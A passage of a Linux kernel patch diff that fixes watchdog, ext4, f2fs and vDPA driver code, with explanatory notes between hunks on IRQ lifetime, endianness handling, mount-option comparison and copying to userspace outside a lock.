+-
+ 	ret = vdpa_mgmtdev_register(&ifcvf_mgmt_dev->mdev);
+ 	if (ret) {
+ 		IFCVF_ERR(pdev,
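[editor's note] The ifcvf refactor moves struct ifcvf_hw out of the adapter and into the management device, which invalidates the old vf_to_adapter() helper: container_of() is only correct while the member is actually embedded in the assumed outer struct. Storing the pci_dev pointer directly in ifcvf_hw removes that coupling. Illustration of the hazard, with hypothetical types:

struct inner { struct device *dev; /* explicit back-pointer */ };
struct outer { int x; struct inner in; };

/* valid only while 'in' really lives inside a struct outer;
 * once inner is allocated elsewhere this computes garbage */
struct outer *o = container_of(p, struct outer, in);

The refactor also inverts the lifetime: the adapter is now allocated in dev_add() rather than at PCI probe time, so repeated add/del cycles each get a fresh vDPA device instead of reusing one created once.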
+diff --git a/drivers/watchdog/at91sam9_wdt.c b/drivers/watchdog/at91sam9_wdt.c
+index 292b5a1ca8318..fed7be2464420 100644
+--- a/drivers/watchdog/at91sam9_wdt.c
++++ b/drivers/watchdog/at91sam9_wdt.c
+@@ -206,10 +206,9 @@ static int at91_wdt_init(struct platform_device *pdev, struct at91wdt *wdt)
+ 			 "min heartbeat and max heartbeat might be too close for the system to handle it correctly\n");
+ 
+ 	if ((tmp & AT91_WDT_WDFIEN) && wdt->irq) {
+-		err = request_irq(wdt->irq, wdt_interrupt,
+-				  IRQF_SHARED | IRQF_IRQPOLL |
+-				  IRQF_NO_SUSPEND,
+-				  pdev->name, wdt);
++		err = devm_request_irq(dev, wdt->irq, wdt_interrupt,
++				       IRQF_SHARED | IRQF_IRQPOLL | IRQF_NO_SUSPEND,
++				       pdev->name, wdt);
+ 		if (err)
+ 			return err;
+ 	}
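[editor's note] Switching at91sam9_wdt to devm_request_irq() ties the IRQ's lifetime to the device, so the handler is released automatically on probe failure and driver detach; the plain request_irq() it replaces needed a matching free_irq() on every exit path, which this driver lacked. Kernel-context shape:

err = devm_request_irq(dev, wdt->irq, wdt_interrupt,
		       IRQF_SHARED | IRQF_IRQPOLL | IRQF_NO_SUSPEND,
		       pdev->name, wdt);
if (err)
	return err;	/* no free_irq() needed on any later error path */

The usual devm caveat applies: managed resources are released in reverse registration order after remove(), so the handler must tolerate running until that point.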
+diff --git a/drivers/watchdog/pcwd_usb.c b/drivers/watchdog/pcwd_usb.c
+index 1bdaf17c1d38d..8202f0a6b0935 100644
+--- a/drivers/watchdog/pcwd_usb.c
++++ b/drivers/watchdog/pcwd_usb.c
+@@ -325,7 +325,8 @@ static int usb_pcwd_set_heartbeat(struct usb_pcwd_private *usb_pcwd, int t)
+ static int usb_pcwd_get_temperature(struct usb_pcwd_private *usb_pcwd,
+ 							int *temperature)
+ {
+-	unsigned char msb, lsb;
++	unsigned char msb = 0x00;
++	unsigned char lsb = 0x00;
+ 
+ 	usb_pcwd_send_command(usb_pcwd, CMD_READ_TEMP, &msb, &lsb);
+ 
+@@ -341,7 +342,8 @@ static int usb_pcwd_get_temperature(struct usb_pcwd_private *usb_pcwd,
+ static int usb_pcwd_get_timeleft(struct usb_pcwd_private *usb_pcwd,
+ 								int *time_left)
+ {
+-	unsigned char msb, lsb;
++	unsigned char msb = 0x00;
++	unsigned char lsb = 0x00;
+ 
+ 	/* Read the time that's left before rebooting */
+ 	/* Note: if the board is not yet armed then we will read 0xFFFF */
+diff --git a/drivers/watchdog/rzg2l_wdt.c b/drivers/watchdog/rzg2l_wdt.c
+index 974a4194a8fd6..d404953d0e0f4 100644
+--- a/drivers/watchdog/rzg2l_wdt.c
++++ b/drivers/watchdog/rzg2l_wdt.c
+@@ -8,6 +8,7 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+@@ -35,6 +36,8 @@
+ 
+ #define F2CYCLE_NSEC(f)			(1000000000 / (f))
+ 
++#define RZV2M_A_NSEC			730
++
+ static bool nowayout = WATCHDOG_NOWAYOUT;
+ module_param(nowayout, bool, 0);
+ MODULE_PARM_DESC(nowayout, "Watchdog cannot be stopped once started (default="
+@@ -51,11 +54,35 @@ struct rzg2l_wdt_priv {
+ 	struct reset_control *rstc;
+ 	unsigned long osc_clk_rate;
+ 	unsigned long delay;
++	unsigned long minimum_assertion_period;
+ 	struct clk *pclk;
+ 	struct clk *osc_clk;
+ 	enum rz_wdt_type devtype;
+ };
+ 
++static int rzg2l_wdt_reset(struct rzg2l_wdt_priv *priv)
++{
++	int err, status;
++
++	if (priv->devtype == WDT_RZV2M) {
++		/* WDT needs TYPE-B reset control */
++		err = reset_control_assert(priv->rstc);
++		if (err)
++			return err;
++		ndelay(priv->minimum_assertion_period);
++		err = reset_control_deassert(priv->rstc);
++		if (err)
++			return err;
++		err = read_poll_timeout(reset_control_status, status,
++					status != 1, 0, 1000, false,
++					priv->rstc);
++	} else {
++		err = reset_control_reset(priv->rstc);
++	}
++
++	return err;
++}
++
+ static void rzg2l_wdt_wait_delay(struct rzg2l_wdt_priv *priv)
+ {
+ 	/* delay timer when change the setting register */
+@@ -115,25 +142,23 @@ static int rzg2l_wdt_stop(struct watchdog_device *wdev)
+ {
+ 	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
+ 
++	rzg2l_wdt_reset(priv);
+ 	pm_runtime_put(wdev->parent);
+-	reset_control_reset(priv->rstc);
+ 
+ 	return 0;
+ }
+ 
+ static int rzg2l_wdt_set_timeout(struct watchdog_device *wdev, unsigned int timeout)
+ {
+-	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
+-
+ 	wdev->timeout = timeout;
+ 
+ 	/*
+ 	 * If the watchdog is active, reset the module for updating the WDTSET
+-	 * register so that it is updated with new timeout values.
++	 * register by calling rzg2l_wdt_stop() (which internally calls reset_control_reset()
++	 * to reset the module) so that it is updated with new timeout values.
+ 	 */
+ 	if (watchdog_active(wdev)) {
+-		pm_runtime_put(wdev->parent);
+-		reset_control_reset(priv->rstc);
++		rzg2l_wdt_stop(wdev);
+ 		rzg2l_wdt_start(wdev);
+ 	}
+ 
+@@ -156,6 +181,7 @@ static int rzg2l_wdt_restart(struct watchdog_device *wdev,
+ 		rzg2l_wdt_write(priv, PEEN_FORCE, PEEN);
+ 	} else {
+ 		/* RZ/V2M doesn't have parity error registers */
++		rzg2l_wdt_reset(priv);
+ 
+ 		wdev->timeout = 0;
+ 
+@@ -253,6 +279,13 @@ static int rzg2l_wdt_probe(struct platform_device *pdev)
+ 
+ 	priv->devtype = (uintptr_t)of_device_get_match_data(dev);
+ 
++	if (priv->devtype == WDT_RZV2M) {
++		priv->minimum_assertion_period = RZV2M_A_NSEC +
++			3 * F2CYCLE_NSEC(pclk_rate) + 5 *
++			max(F2CYCLE_NSEC(priv->osc_clk_rate),
++			    F2CYCLE_NSEC(pclk_rate));
++	}
++
+ 	pm_runtime_enable(&pdev->dev);
+ 
+ 	priv->wdev.info = &rzg2l_wdt_ident;
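For reference, read_poll_timeout() from <linux/iopoll.h> (newly included above) repeatedly evaluates val = op(args...) until cond is true or timeout_us microseconds elapse, returning 0 on success and -ETIMEDOUT otherwise; sleep_us == 0 means busy-wait. A rough open-coded equivalent of the call in rzg2l_wdt_reset() (sketch only; the real macro also re-reads once after the deadline to close a late-success race):

	u64 deadline = ktime_get_ns() + 1000 * NSEC_PER_USEC;

	err = 0;
	for (;;) {
		status = reset_control_status(priv->rstc);
		if (status != 1)	/* deasserted, or an error code */
			break;
		if (ktime_get_ns() > deadline) {
			err = -ETIMEDOUT;
			break;
		}
		cpu_relax();		/* sleep_us == 0: busy-wait */
	}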
+diff --git a/drivers/watchdog/sbsa_gwdt.c b/drivers/watchdog/sbsa_gwdt.c
+index 9791c74aebd48..63862803421f1 100644
+--- a/drivers/watchdog/sbsa_gwdt.c
++++ b/drivers/watchdog/sbsa_gwdt.c
+@@ -150,6 +150,7 @@ static int sbsa_gwdt_set_timeout(struct watchdog_device *wdd,
+ 	struct sbsa_gwdt *gwdt = watchdog_get_drvdata(wdd);
+ 
+ 	wdd->timeout = timeout;
++	timeout = clamp_t(unsigned int, timeout, 1, wdd->max_hw_heartbeat_ms / 1000);
+ 
+ 	if (action)
+ 		sbsa_gwdt_reg_write(gwdt->clk * timeout, gwdt);
+diff --git a/drivers/watchdog/watchdog_dev.c b/drivers/watchdog/watchdog_dev.c
+index 55574ed425042..fdffa6859dde3 100644
+--- a/drivers/watchdog/watchdog_dev.c
++++ b/drivers/watchdog/watchdog_dev.c
+@@ -1061,8 +1061,8 @@ static int watchdog_cdev_register(struct watchdog_device *wdd)
+ 		if (wdd->id == 0) {
+ 			misc_deregister(&watchdog_miscdev);
+ 			old_wd_data = NULL;
+-			put_device(&wd_data->dev);
+ 		}
++		put_device(&wd_data->dev);
+ 		return err;
+ 	}
+ 
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 4e739902dc03a..a2bc440743ae4 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -1529,6 +1529,7 @@ struct ext4_sb_info {
+ 	unsigned int s_mount_opt2;
+ 	unsigned long s_mount_flags;
+ 	unsigned int s_def_mount_opt;
++	unsigned int s_def_mount_opt2;
+ 	ext4_fsblk_t s_sb_block;
+ 	atomic64_t s_resv_clusters;
+ 	kuid_t s_resuid;
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 7ed71c652f67f..1110bfa0a5b73 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -1354,8 +1354,14 @@ struct dentry_info_args {
+ 	char *dname;
+ };
+ 
++/* Same as struct ext4_fc_tl, but uses native endianness fields */
++struct ext4_fc_tl_mem {
++	u16 fc_tag;
++	u16 fc_len;
++};
++
+ static inline void tl_to_darg(struct dentry_info_args *darg,
+-			      struct ext4_fc_tl *tl, u8 *val)
++			      struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_dentry_info fcd;
+ 
+@@ -1367,16 +1373,18 @@ static inline void tl_to_darg(struct dentry_info_args *darg,
+ 	darg->dname_len = tl->fc_len - sizeof(struct ext4_fc_dentry_info);
+ }
+ 
+-static inline void ext4_fc_get_tl(struct ext4_fc_tl *tl, u8 *val)
++static inline void ext4_fc_get_tl(struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+-	memcpy(tl, val, EXT4_FC_TAG_BASE_LEN);
+-	tl->fc_len = le16_to_cpu(tl->fc_len);
+-	tl->fc_tag = le16_to_cpu(tl->fc_tag);
++	struct ext4_fc_tl tl_disk;
++
++	memcpy(&tl_disk, val, EXT4_FC_TAG_BASE_LEN);
++	tl->fc_len = le16_to_cpu(tl_disk.fc_len);
++	tl->fc_tag = le16_to_cpu(tl_disk.fc_tag);
+ }
+ 
+ /* Unlink replay function */
+-static int ext4_fc_replay_unlink(struct super_block *sb, struct ext4_fc_tl *tl,
+-				 u8 *val)
++static int ext4_fc_replay_unlink(struct super_block *sb,
++				 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode, *old_parent;
+ 	struct qstr entry;
+@@ -1473,8 +1481,8 @@ out:
+ }
+ 
+ /* Link replay function */
+-static int ext4_fc_replay_link(struct super_block *sb, struct ext4_fc_tl *tl,
+-			       u8 *val)
++static int ext4_fc_replay_link(struct super_block *sb,
++			       struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode;
+ 	struct dentry_info_args darg;
+@@ -1528,8 +1536,8 @@ static int ext4_fc_record_modified_inode(struct super_block *sb, int ino)
+ /*
+  * Inode replay function
+  */
+-static int ext4_fc_replay_inode(struct super_block *sb, struct ext4_fc_tl *tl,
+-				u8 *val)
++static int ext4_fc_replay_inode(struct super_block *sb,
++				struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_inode fc_inode;
+ 	struct ext4_inode *raw_inode;
+@@ -1631,8 +1639,8 @@ out:
+  * inode for which we are trying to create a dentry here, should already have
+  * been replayed before we start here.
+  */
+-static int ext4_fc_replay_create(struct super_block *sb, struct ext4_fc_tl *tl,
+-				 u8 *val)
++static int ext4_fc_replay_create(struct super_block *sb,
++				 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	int ret = 0;
+ 	struct inode *inode = NULL;
+@@ -1730,7 +1738,7 @@ int ext4_fc_record_regions(struct super_block *sb, int ino,
+ 
+ /* Replay add range tag */
+ static int ext4_fc_replay_add_range(struct super_block *sb,
+-				    struct ext4_fc_tl *tl, u8 *val)
++				    struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_add_range fc_add_ex;
+ 	struct ext4_extent newex, *ex;
+@@ -1850,8 +1858,8 @@ out:
+ 
+ /* Replay DEL_RANGE tag */
+ static int
+-ext4_fc_replay_del_range(struct super_block *sb, struct ext4_fc_tl *tl,
+-			 u8 *val)
++ext4_fc_replay_del_range(struct super_block *sb,
++			 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode;
+ 	struct ext4_fc_del_range lrange;
+@@ -2047,7 +2055,7 @@ static int ext4_fc_replay_scan(journal_t *journal,
+ 	struct ext4_fc_replay_state *state;
+ 	int ret = JBD2_FC_REPLAY_CONTINUE;
+ 	struct ext4_fc_add_range ext;
+-	struct ext4_fc_tl tl;
++	struct ext4_fc_tl_mem tl;
+ 	struct ext4_fc_tail tail;
+ 	__u8 *start, *end, *cur, *val;
+ 	struct ext4_fc_head head;
+@@ -2166,7 +2174,7 @@ static int ext4_fc_replay(journal_t *journal, struct buffer_head *bh,
+ {
+ 	struct super_block *sb = journal->j_private;
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+-	struct ext4_fc_tl tl;
++	struct ext4_fc_tl_mem tl;
+ 	__u8 *start, *end, *cur, *val;
+ 	int ret = JBD2_FC_REPLAY_CONTINUE;
+ 	struct ext4_fc_replay_state *state = &sbi->s_fc_replay_state;
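The ext4_fc_tl_mem split above keeps the on-disk header (struct ext4_fc_tl, __le16 fields) separate from the native-endian copy the replay path actually uses, instead of byte-swapping the little-endian struct in place and leaving its declared types lying about their contents. A minimal userspace sketch of the same decode pattern (hypothetical struct names, glibc <endian.h>):

#include <endian.h>
#include <stdint.h>
#include <string.h>

struct tl_disk {		/* on-disk layout, little-endian */
	uint16_t fc_tag;
	uint16_t fc_len;
} __attribute__((packed));

struct tl_mem {			/* in-memory, native endianness */
	uint16_t fc_tag;
	uint16_t fc_len;
};

static void get_tl(struct tl_mem *tl, const uint8_t *val)
{
	struct tl_disk disk;

	memcpy(&disk, val, sizeof(disk));	/* val may be unaligned */
	tl->fc_tag = le16toh(disk.fc_tag);
	tl->fc_len = le16toh(disk.fc_len);
}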
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index aa4f65663fad8..8011600999586 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -2146,7 +2146,7 @@ static int ext4_parse_param(struct fs_context *fc, struct fs_parameter *param)
+ 		return 0;
+ 	case Opt_commit:
+ 		if (result.uint_32 == 0)
+-			ctx->s_commit_interval = JBD2_DEFAULT_MAX_COMMIT_AGE;
++			result.uint_32 = JBD2_DEFAULT_MAX_COMMIT_AGE;
+ 		else if (result.uint_32 > INT_MAX / HZ) {
+ 			ext4_msg(NULL, KERN_ERR,
+ 				 "Invalid commit interval %d, "
+@@ -2894,7 +2894,7 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	struct ext4_super_block *es = sbi->s_es;
+-	int def_errors, def_mount_opt = sbi->s_def_mount_opt;
++	int def_errors;
+ 	const struct mount_opts *m;
+ 	char sep = nodefs ? '\n' : ',';
+ 
+@@ -2906,15 +2906,28 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ 
+ 	for (m = ext4_mount_opts; m->token != Opt_err; m++) {
+ 		int want_set = m->flags & MOPT_SET;
++		int opt_2 = m->flags & MOPT_2;
++		unsigned int mount_opt, def_mount_opt;
++
+ 		if (((m->flags & (MOPT_SET|MOPT_CLEAR)) == 0) ||
+ 		    m->flags & MOPT_SKIP)
+ 			continue;
+-		if (!nodefs && !(m->mount_opt & (sbi->s_mount_opt ^ def_mount_opt)))
+-			continue; /* skip if same as the default */
++
++		if (opt_2) {
++			mount_opt = sbi->s_mount_opt2;
++			def_mount_opt = sbi->s_def_mount_opt2;
++		} else {
++			mount_opt = sbi->s_mount_opt;
++			def_mount_opt = sbi->s_def_mount_opt;
++		}
++		/* skip if same as the default */
++		if (!nodefs && !(m->mount_opt & (mount_opt ^ def_mount_opt)))
++			continue;
++		/* select Opt_noFoo vs Opt_Foo */
+ 		if ((want_set &&
+-		     (sbi->s_mount_opt & m->mount_opt) != m->mount_opt) ||
+-		    (!want_set && (sbi->s_mount_opt & m->mount_opt)))
+-			continue; /* select Opt_noFoo vs Opt_Foo */
++		     (mount_opt & m->mount_opt) != m->mount_opt) ||
++		    (!want_set && (mount_opt & m->mount_opt)))
++			continue;
+ 		SEQ_OPTS_PRINT("%s", token2str(m->token));
+ 	}
+ 
+@@ -2942,7 +2955,7 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ 	if (nodefs || sbi->s_stripe)
+ 		SEQ_OPTS_PRINT("stripe=%lu", sbi->s_stripe);
+ 	if (nodefs || EXT4_MOUNT_DATA_FLAGS &
+-			(sbi->s_mount_opt ^ def_mount_opt)) {
++			(sbi->s_mount_opt ^ sbi->s_def_mount_opt)) {
+ 		if (test_opt(sb, DATA_FLAGS) == EXT4_MOUNT_JOURNAL_DATA)
+ 			SEQ_OPTS_PUTS("data=journal");
+ 		else if (test_opt(sb, DATA_FLAGS) == EXT4_MOUNT_ORDERED_DATA)
+@@ -5087,6 +5100,7 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 		goto failed_mount;
+ 
+ 	sbi->s_def_mount_opt = sbi->s_mount_opt;
++	sbi->s_def_mount_opt2 = sbi->s_mount_opt2;
+ 
+ 	err = ext4_check_opt_consistency(fc, sb);
+ 	if (err < 0)
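The _ext4_show_options() rework rests on one bit trick: mount_opt ^ def_mount_opt has a bit set exactly where the current options differ from the defaults recorded at mount time, so ANDing that with an option's mask decides whether it must be printed. The fix adds a second default snapshot (s_def_mount_opt2) so MOPT_2 options are compared against their own baseline rather than s_mount_opt's. A tiny demonstration of the mask logic:

#include <stdio.h>

int main(void)
{
	unsigned int def = 0x05;	/* defaults: bits 0 and 2 set */
	unsigned int cur = 0x06;	/* current:  bits 1 and 2 set */
	unsigned int opts[] = { 0x01, 0x02, 0x04 };

	for (int i = 0; i < 3; i++)
		printf("opt %#x: %s\n", opts[i],
		       ((cur ^ def) & opts[i]) ? "print" : "skip, same as default");
	/* bit 0 changed (cleared), bit 1 changed (set), bit 2 unchanged */
	return 0;
}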
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 5f4519af98214..f92899bfcbd5e 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -4138,20 +4138,24 @@ static int f2fs_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
+ 	 */
+ 	map.m_len = fscrypt_limit_io_blocks(inode, map.m_lblk, map.m_len);
+ 
+-	if (map.m_flags & (F2FS_MAP_MAPPED | F2FS_MAP_UNWRITTEN)) {
+-		iomap->length = blks_to_bytes(inode, map.m_len);
+-		if (map.m_flags & F2FS_MAP_MAPPED) {
+-			iomap->type = IOMAP_MAPPED;
+-			iomap->flags |= IOMAP_F_MERGED;
+-		} else {
+-			iomap->type = IOMAP_UNWRITTEN;
+-		}
+-		if (WARN_ON_ONCE(!__is_valid_data_blkaddr(map.m_pblk)))
+-			return -EINVAL;
++	/*
++	 * We should never see delalloc or compressed extents here based on
++	 * prior flushing and checks.
++	 */
++	if (WARN_ON_ONCE(map.m_pblk == NEW_ADDR))
++		return -EINVAL;
++	if (WARN_ON_ONCE(map.m_pblk == COMPRESS_ADDR))
++		return -EINVAL;
+ 
++	if (map.m_pblk != NULL_ADDR) {
++		iomap->length = blks_to_bytes(inode, map.m_len);
++		iomap->type = IOMAP_MAPPED;
++		iomap->flags |= IOMAP_F_MERGED;
+ 		iomap->bdev = map.m_bdev;
+ 		iomap->addr = blks_to_bytes(inode, map.m_pblk);
+ 	} else {
++		if (flags & IOMAP_WRITE)
++			return -ENOTBLK;
+ 		iomap->length = blks_to_bytes(inode, next_pgofs) -
+ 				iomap->offset;
+ 		iomap->type = IOMAP_HOLE;
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 8b9f0b3c77232..87664c309b3c8 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -764,6 +764,7 @@ enum {
+ 	FI_COMPRESS_RELEASED,	/* compressed blocks were released */
+ 	FI_ALIGNED_WRITE,	/* enable aligned write */
+ 	FI_COW_FILE,		/* indicate COW file */
++	FI_ATOMIC_COMMITTED,	/* indicate atomic commit completed except disk sync */
+ 	FI_MAX,			/* max flag, never be used */
+ };
+ 
+@@ -822,6 +823,7 @@ struct f2fs_inode_info {
+ 	unsigned int i_cluster_size;		/* cluster size */
+ 
+ 	unsigned int atomic_write_cnt;
++	loff_t original_i_size;		/* original i_size before atomic write */
+ };
+ 
+ static inline void get_extent_info(struct extent_info *ext,
+@@ -3072,6 +3074,8 @@ static inline void f2fs_i_blocks_write(struct inode *inode,
+ 		set_inode_flag(inode, FI_AUTO_RECOVER);
+ }
+ 
++static inline bool f2fs_is_atomic_file(struct inode *inode);
++
+ static inline void f2fs_i_size_write(struct inode *inode, loff_t i_size)
+ {
+ 	bool clean = !is_inode_flag_set(inode, FI_DIRTY_INODE);
+@@ -3081,6 +3085,10 @@ static inline void f2fs_i_size_write(struct inode *inode, loff_t i_size)
+ 		return;
+ 
+ 	i_size_write(inode, i_size);
++
++	if (f2fs_is_atomic_file(inode))
++		return;
++
+ 	f2fs_mark_inode_dirty_sync(inode, true);
+ 	if (clean || recover)
+ 		set_inode_flag(inode, FI_AUTO_RECOVER);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index f96bbfa8b3991..773b3ddc2cd72 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -1865,7 +1865,10 @@ static int f2fs_release_file(struct inode *inode, struct file *filp)
+ 			atomic_read(&inode->i_writecount) != 1)
+ 		return 0;
+ 
++	inode_lock(inode);
+ 	f2fs_abort_atomic_write(inode, true);
++	inode_unlock(inode);
++
+ 	return 0;
+ }
+ 
+@@ -1879,8 +1882,13 @@ static int f2fs_file_flush(struct file *file, fl_owner_t id)
+ 	 * until all the writers close its file. Since this should be done
+ 	 * before dropping file lock, it needs to do in ->flush.
+ 	 */
+-	if (F2FS_I(inode)->atomic_write_task == current)
++	if (F2FS_I(inode)->atomic_write_task == current &&
++				(current->flags & PF_EXITING)) {
++		inode_lock(inode);
+ 		f2fs_abort_atomic_write(inode, true);
++		inode_unlock(inode);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -2041,6 +2049,7 @@ static int f2fs_ioc_start_atomic_write(struct file *filp)
+ 	struct f2fs_inode_info *fi = F2FS_I(inode);
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct inode *pinode;
++	loff_t isize;
+ 	int ret;
+ 
+ 	if (!inode_owner_or_capable(mnt_userns, inode))
+@@ -2085,27 +2094,39 @@ static int f2fs_ioc_start_atomic_write(struct file *filp)
+ 		goto out;
+ 	}
+ 
+-	/* Create a COW inode for atomic write */
+-	pinode = f2fs_iget(inode->i_sb, fi->i_pino);
+-	if (IS_ERR(pinode)) {
+-		f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+-		ret = PTR_ERR(pinode);
+-		goto out;
+-	}
++	/* Check if the inode already has a COW inode */
++	if (fi->cow_inode == NULL) {
++		/* Create a COW inode for atomic write */
++		pinode = f2fs_iget(inode->i_sb, fi->i_pino);
++		if (IS_ERR(pinode)) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			ret = PTR_ERR(pinode);
++			goto out;
++		}
+ 
+-	ret = f2fs_get_tmpfile(mnt_userns, pinode, &fi->cow_inode);
+-	iput(pinode);
+-	if (ret) {
+-		f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+-		goto out;
++		ret = f2fs_get_tmpfile(mnt_userns, pinode, &fi->cow_inode);
++		iput(pinode);
++		if (ret) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			goto out;
++		}
++
++		set_inode_flag(fi->cow_inode, FI_COW_FILE);
++		clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
++	} else {
++		/* Reuse the already created COW inode */
++		f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
+ 	}
+-	f2fs_i_size_write(fi->cow_inode, i_size_read(inode));
++
++	f2fs_write_inode(inode, NULL);
++
++	isize = i_size_read(inode);
++	fi->original_i_size = isize;
++	f2fs_i_size_write(fi->cow_inode, isize);
+ 
+ 	stat_inc_atomic_inode(inode);
+ 
+ 	set_inode_flag(inode, FI_ATOMIC_FILE);
+-	set_inode_flag(fi->cow_inode, FI_COW_FILE);
+-	clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
+ 	f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+ 
+ 	f2fs_update_time(sbi, REQ_TIME);
+@@ -2137,16 +2158,14 @@ static int f2fs_ioc_commit_atomic_write(struct file *filp)
+ 
+ 	if (f2fs_is_atomic_file(inode)) {
+ 		ret = f2fs_commit_atomic_write(inode);
+-		if (ret)
+-			goto unlock_out;
+-
+-		ret = f2fs_do_sync_file(filp, 0, LLONG_MAX, 0, true);
+ 		if (!ret)
+-			f2fs_abort_atomic_write(inode, false);
++			ret = f2fs_do_sync_file(filp, 0, LLONG_MAX, 0, true);
++
++		f2fs_abort_atomic_write(inode, ret);
+ 	} else {
+ 		ret = f2fs_do_sync_file(filp, 0, LLONG_MAX, 1, false);
+ 	}
+-unlock_out:
++
+ 	inode_unlock(inode);
+ 	mnt_drop_write_file(filp);
+ 	return ret;
+@@ -2326,6 +2345,7 @@ static int f2fs_ioc_get_encryption_pwsalt(struct file *filp, unsigned long arg)
+ {
+ 	struct inode *inode = file_inode(filp);
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++	u8 encrypt_pw_salt[16];
+ 	int err;
+ 
+ 	if (!f2fs_sb_has_encrypt(sbi))
+@@ -2350,12 +2370,14 @@ static int f2fs_ioc_get_encryption_pwsalt(struct file *filp, unsigned long arg)
+ 		goto out_err;
+ 	}
+ got_it:
+-	if (copy_to_user((__u8 __user *)arg, sbi->raw_super->encrypt_pw_salt,
+-									16))
+-		err = -EFAULT;
++	memcpy(encrypt_pw_salt, sbi->raw_super->encrypt_pw_salt, 16);
+ out_err:
+ 	f2fs_up_write(&sbi->sb_lock);
+ 	mnt_drop_write_file(filp);
++
++	if (!err && copy_to_user((__u8 __user *)arg, encrypt_pw_salt, 16))
++		err = -EFAULT;
++
+ 	return err;
+ }
+ 
+@@ -3930,7 +3952,7 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (inode->i_size != 0) {
++	if (F2FS_HAS_BLOCKS(inode)) {
+ 		ret = -EFBIG;
+ 		goto out;
+ 	}
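The pwsalt hunk follows a standard pattern: copy_to_user() may fault and sleep, so it must not run under sbi->sb_lock; the salt is snapshotted into a stack buffer while the lock is held and copied to userspace only after the lock is dropped. The general shape (sketch with hypothetical lock helpers):

	u8 buf[16];

	lock();					/* non-sleepable section */
	memcpy(buf, shared_data, sizeof(buf));	/* cheap, cannot fault */
	unlock();

	if (copy_to_user(uptr, buf, sizeof(buf)))	/* may fault and sleep */
		return -EFAULT;
	return 0;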
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 5d6fd824f74f2..229ddc2f7b079 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -621,9 +621,12 @@ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ 	ri->i_uid = cpu_to_le32(i_uid_read(inode));
+ 	ri->i_gid = cpu_to_le32(i_gid_read(inode));
+ 	ri->i_links = cpu_to_le32(inode->i_nlink);
+-	ri->i_size = cpu_to_le64(i_size_read(inode));
+ 	ri->i_blocks = cpu_to_le64(SECTOR_TO_BLOCK(inode->i_blocks) + 1);
+ 
++	if (!f2fs_is_atomic_file(inode) ||
++			is_inode_flag_set(inode, FI_ATOMIC_COMMITTED))
++		ri->i_size = cpu_to_le64(i_size_read(inode));
++
+ 	if (et) {
+ 		read_lock(&et->lock);
+ 		set_raw_extent(&et->largest, &ri->i_ext);
+@@ -761,11 +764,18 @@ int f2fs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ void f2fs_evict_inode(struct inode *inode)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	nid_t xnid = F2FS_I(inode)->i_xattr_nid;
++	struct f2fs_inode_info *fi = F2FS_I(inode);
++	nid_t xnid = fi->i_xattr_nid;
+ 	int err = 0;
+ 
+ 	f2fs_abort_atomic_write(inode, true);
+ 
++	if (fi->cow_inode) {
++		clear_inode_flag(fi->cow_inode, FI_COW_FILE);
++		iput(fi->cow_inode);
++		fi->cow_inode = NULL;
++	}
++
+ 	trace_f2fs_evict_inode(inode);
+ 	truncate_inode_pages_final(&inode->i_data);
+ 
+@@ -852,7 +862,7 @@ no_delete:
+ 	stat_dec_inline_inode(inode);
+ 	stat_dec_compr_inode(inode);
+ 	stat_sub_compr_blocks(inode,
